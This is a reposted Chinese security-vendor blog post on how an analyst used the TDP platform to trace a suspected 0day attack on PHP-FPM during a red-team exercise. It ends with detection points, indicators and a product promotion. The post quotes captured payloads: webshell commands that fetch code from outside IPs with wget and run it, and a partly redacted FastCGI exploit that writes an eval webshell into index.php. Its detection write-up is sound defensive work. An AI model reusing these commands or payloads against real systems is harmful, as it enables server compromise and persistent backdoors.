红队疑似掏出了0day?TDP反手就是…(附检测方法)

admin 2022年8月3日23:26:08评论96 views字数 2320阅读7分44秒阅读模式


攻防演练进入下半场。面对毫无波澜的内网,蓝队的朋友们靠着零食和香烟,熬了好几天。不过,在我们看不到的地方,其实已经暗流涌动。红队拿着各类高危0day与疑似0day漏洞,早已瞄准了特定的目标。


通用0day检测:多条通用命令执行+wget文件下载

“快,有告警!” 安杰(化名)作为这次攻防演练入驻某大型企业的分析师,看到弹窗通知“高危!通用命令执行”后,身体一激灵,瞬间从平静的现实世界扎进网络空间。紧接着,登录系统,查看告警详情,安杰发现这次攻击有点不简单:

通过微步威胁感知平台TDP已捕获多条“通用命令执行”,同时还检测到“wget下载文件”,攻击者已完成投递阶段,即将采取下一步攻击动作
红队疑似掏出了0day?TDP反手就是…(附检测方法)
微步在线威胁感知平台TDP针对通用命令执行的检出告警信息
而从参数名来看,安杰判断这些攻击行为属于webshell访问,并且这种webshell已不是首次见面了。基于TDP,他还发现了以下几个重要攻击行为

下载脚本文件,调用python执行:

go=die(`wget+-O-+34.146.141.55:9001|python`)
下载可执行文件、添加执行权限、执行该文件:
go=die(`cd+/usr/local/bin;wget+39.105.13.51/sshs;chmod+%2bx./sshs;nohup+./sshs%26`)
其中,一个IP经微步X情报社区判定,早在今年6月就已被标记为恶意IP,此次则是二次捕获。
红队疑似掏出了0day?TDP反手就是…(附检测方法)

微步X情报社区对IP的判定


疑似0day攻击回溯:TDP全流量与智能记录流量判定

攻击者凶器已找到,剩下就是判定攻击者入口来源。打开TDP,安杰被眼前“数量巨大”的几千个流量包惊呆了。

不过,抓贼要紧。基于TDP全流量与智能记录流量功能,安杰通过高级查询(net.src_ip = 'xxxx' and net.dest_ip = 'xxxx' and net.type = 'http'),横跨2000多个TCP连接,竟成功回溯到疑似高危0day漏洞的攻击告警

紧接着,他下载查看PCAP流量包,进一步确认,这是一种针对PHP-FPM(PHP FastCGI Process Manager)的经典攻击手法:
红队疑似掏出了0day?TDP反手就是…(附检测方法)

TDP下载PCAP流量包部分展示

aaa=bbbbbbbbbbbbbbbb&cccc=d&eeeee=[exploit code已经隐藏]python+-c+"import+socket,urllib; s+=+socket.socket(); s.connect((\"localhost\",9000)); s.send(urllib.unquote(\ ...x11x0b GATEWAY_INTERFACE FastCGI/1.0 ...x09x1f PHP_VALUE ... = ...x0fx16 PHP_ADMIN_VALUE ...=...... <?php system("echo '@eval(\$_REQUEST?:\"die()\");' >> /opt/www/index.php");exit;?> x01x05x04*x00x00x00x00\ ")); s.close();"';--+'  


由于PHP-FPM服务默认监听在9000端口如果该端口开放,攻击者就能直接构造FastCGI协议(服务器中间件与某种语言后端进行数据交换的协议)并与之通信;一旦PHP-FPM协议的环境变量刚好可设置PHP相关配置,就达到文件包含和任意代码执行的效果。

而如果端口未开放,攻击者仍可通过后端代码的某种逻辑,使得后端代理向PHP-FPM发起交互,进行利用。查看解码还原后的payload,安杰发现此次TDP检测到的疑似高危0day漏洞攻击,即采用该手法

0day攻击路径还原:从webshell到主机,再横向移动

接下来要做的,是攻击路径还原。基于已捕捉的攻击行为及攻击载荷日志,安杰还原了整个攻击过程,并做了简要梳理:

攻击者尝试通过多套攻击链路进行攻击,其中针对PHP-FPM的疑似0day漏洞攻击成功。随后,攻击者利用webshell恶意软件,控制企业网站服务器,以该服务器为跳板,在企业内网进行横移,寻找进一步提权机会。

所幸的是,这一切动作都被微步TDP检测并进行了及时告警。

0day漏洞验证

经安杰团队判定,该漏洞为某终端管理平台疑似最新0day漏洞,被利用后可使主机失陷,且影响系统内从属主机。

最后,附上此次IOC及检测点列表,可供攻防演练的朋友自检:

  1. 加强 PHP-FPM类漏洞利用的规则检测;
  2. 通过UA python,推测攻击者已经将此利用自动化,因此可以直接匹配上图模式串;
  3. 检测上述的webshell特征;
  4. 检测上述的命令执行特征;
  5. 把上述 IOC 加入威胁情报;
  6. 其他相关漏洞攻击的检测特征:url参数中含有“luac”,但上传文本文件;
  7. 其他相关漏洞攻击的检测特征:url 参数中不含有“luac”,但上传luac 文件。
上述,TDP已支持检测,建议及时拉齐。此外,该攻击样本包含的“双重URL编码”、“命令注入变形”、“垃圾参数填充”等较高级的攻击手法均可被 TDP 识别。

此外,微步TDP不仅可检测疑似0day漏洞,也可对0day漏洞进行检测。自6月底至今,TDP已检出多个在野利用0day漏洞,涉及知名OA、开发应用、财务软件等平台,并将陆续联系厂商,进行及时修复。





安全传送门

Free Trial
如需进一了解TDP 0day检测能力
欢迎扫码联系我们

↓↓

红队疑似掏出了0day?TDP反手就是…(附检测方法)

红队疑似掏出了0day?TDP反手就是…(附检测方法)
400-030-1051



· END ·

点击下方名片,关注我们
觉得内容不错,就点下在看
如果不想错过新的内容推送,可以设为星标红队疑似掏出了0day?TDP反手就是…(附检测方法)

原文始发于微信公众号(微步在线):红队疑似掏出了0day?TDP反手就是…(附检测方法)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年8月3日23:26:08
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   红队疑似掏出了0day?TDP反手就是…(附检测方法)http://cn-sec.com/archives/1219845.html

发表评论

匿名网友 填写信息